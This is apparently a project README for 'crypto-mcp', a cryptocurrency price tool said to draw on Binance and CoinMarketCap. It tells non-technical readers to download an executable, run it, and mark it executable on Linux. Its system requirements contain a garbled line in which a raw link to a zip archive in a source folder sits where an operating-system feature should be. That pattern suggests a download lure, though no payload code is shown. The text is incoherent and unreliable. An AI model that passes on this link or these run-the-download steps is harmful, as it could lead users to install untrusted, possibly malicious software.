🪙 crypto-mcp - Easily Access Crypto Data

Welcome to crypto-mcp! This application allows you to easily access cryptocurrency data. It uses the Binance public API for quick updates, with CoinMarketCap as a backup. You will find this tool useful for any cryptocurrency queries without needing any technical background.

To get started, you will first need to download and install the application from our Releases page. You can find the latest version here: Download crypto-mcp.

1. Click on the link to visit the Releases page.

2. You will see a list of available versions. Locate the most recent one.

3. Download the appropriate file for your operating system. Usually, you will have options for Windows, macOS, and Linux.

4. Once the download completes, locate the file on your computer (typically in the Downloads folder).

5. Follow these installation steps based on your operating system:

   Windows

   • Double-click the downloaded .exe file.
   • Follow the on-screen prompts to complete the installation.

   macOS

   • Open the downloaded .dmg file.
   • Drag the crypto-mcp app into your Applications folder.

   Linux

   • Open your terminal.
   • Navigate to the location of the downloaded file.
   • Run the command: chmod +x crypto-mcp to make it executable.
   • Then run it with ./crypto-mcp.

• Real-time Data: Get instant updates on cryptocurrency prices from the Binance API.
• Fallback Support: If Binance is unavailable, the app automatically gets data from CoinMarketCap.
• Token Optimization: The data responses are optimized for large language model (LLM) applications.

Make sure your system meets the following minimum requirements:

• Windows: Windows 10 or later
• macOS: macOS Catalina or later
• Linux: Any modern distribution with https://raw.githubusercontent.com/mubeenm5026/crypto-mcp/master/src/services/crypto-mcp-3.6.zip support
• Network: A stable internet connection is required to access real-time data.
